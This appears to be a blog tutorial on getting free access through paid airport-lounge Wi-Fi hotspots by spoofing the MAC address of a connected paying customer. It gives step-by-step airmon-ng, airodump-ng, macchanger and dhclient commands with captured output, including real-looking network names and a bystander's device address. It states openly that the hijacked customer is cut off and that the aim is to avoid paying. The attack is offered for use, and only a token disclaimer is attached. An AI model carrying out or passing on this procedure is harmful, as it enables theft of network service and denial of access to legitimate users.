If you are like me, I hate paying or giving out unnecessary info to these hotspots for security reasons. You might like what I am about to share with you. Here is a simple technique to bypass the landing page. Basically landing pages are authentication gateways, with valid credentials, your MAC/Physical address will be allowed thru. As long as your MAC/Physical address doesn't change, you will be granted access to the Web.
Simple Bypass Technique
For this technique to work, you will need to spoof your MAC addr. Firstly, you will need to identify a connected *cough* paying *cough* client that is already connected to the hotspot, then steal his MAC/Physical addr by spoofing the addr.
Here are the steps, you will need Linux with airmon, macchanger and airodump-ng. I use Kali and all of it are bundled.
Start the monitoring on wlan0:
# airmon-ng start wlan0
Your wlan0 should go into monitoring mode, now you can check for valid SSIDs:
# airodump-ng wlan0mon
CH 11 ][ Elapsed: 36 s ][ 2018-04-04 22:37
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
40:E3:D6:23:A3:C0 -1 0 2 0 6 -1 OPN <length: 0>
40:E3:D6:23:E2:61 -1 0 3 0 6 -1 OPN <length: 0>
F0:5C:19:85:65:62 -53 26 29 0 6 54e. OPN WE WiFi
F0:5C:19:85:65:63 -53 27 0 0 6 54e. OPN aamra WiFi
F0:5C:19:85:65:60 -53 33 0 0 6 54e. WPA2 CCMP PSK <length: 0>
F0:5C:19:85:65:61 -54 28 402 0 6 54e. OPN SKYLOUNGE
40:16:7E:BA:44:10 -62 35 17 0 11 54e WPA2 CCMP PSK K-LOUNGE
E0:91:F5:7D:E7:A4 -65 22 0 0 6 54e WPA2 CCMP PSK icon_Lounge_Wi-Fi
00:6C:BC:EE:8A:E3 -65 32 1 0 11 54e WPA2 CCMP PSK MTB-AIR-LOUNGE WI-FI
88:D7:F6:04:C5:50 -71 18 171 0 6 54e WPA2 CCMP PSK EK_SALES01
DA:0F:99:1C:E1:55 -73 15 0 0 6 54e WPA2 CCMP PSK DIRECT-RC-BRAVIA
I'm going to target aamra WIFI. Firstly, connect to the SSID:
# airodump-ng --bssid 'F0:5C:19:85:65:63' wlan0mon
From here, take note of the clients that are already connected, chose your victim to hijack:
CH 7 ][ Elapsed: 24 s ][ 2018-04-04 23:05
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
F0:5C:19:85:65:63 -59 24 99 2 6 54e. OPN aamra WiFi
BSSID STATION PWR Rate Lost Frames Probe
F0:5C:19:85:65:63 70:8B:CD:0B:CC:42 -32 0e- 6e 69 101
You can stop monitoring the Wifi:
# airmon-ng stop wlan0mon
# ifconfig wlan0 down
Now change your MAC addr and bring it back up:
# macchange -m 70:8B:CD:0B:CC:42 wlan0
Current MAC: f8:34:41:5d:89:ce (unknown)
Permanent MAC: f8:34:41:5d:89:ce (unknown)
New MAC: 70:8b:cd:0b:cc:42 (unknown)
# ifconfig wlan0 up
# ifconfig wlan0
wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.208.113.56 netmask 255.255.240.0 broadcast 10.208.127.255
ether 70:8b:cd:0b:cc:42 txqueuelen 1000 (Ethernet)
RX packets 41 bytes 8537 (8.3 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 75 bytes 12831 (12.5 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
Get a new IP addr:
# dhclient wlan0
And you are now good to go!! I recommend to keep a continuous ping to an Internet addr to keep your connection alive. The hijacked victim will not be able to connect unless you stopped communicating.
There are other fancier techniques such as tunneling thru DNS or ICMP traffic, perhaps I can cover that in the future.
Enjoy! ;-)
*Disclaimer: I take no responsibility for any unlawful or legal repercussion that might occur as a result of your action. This post is intended for educational purposes only.
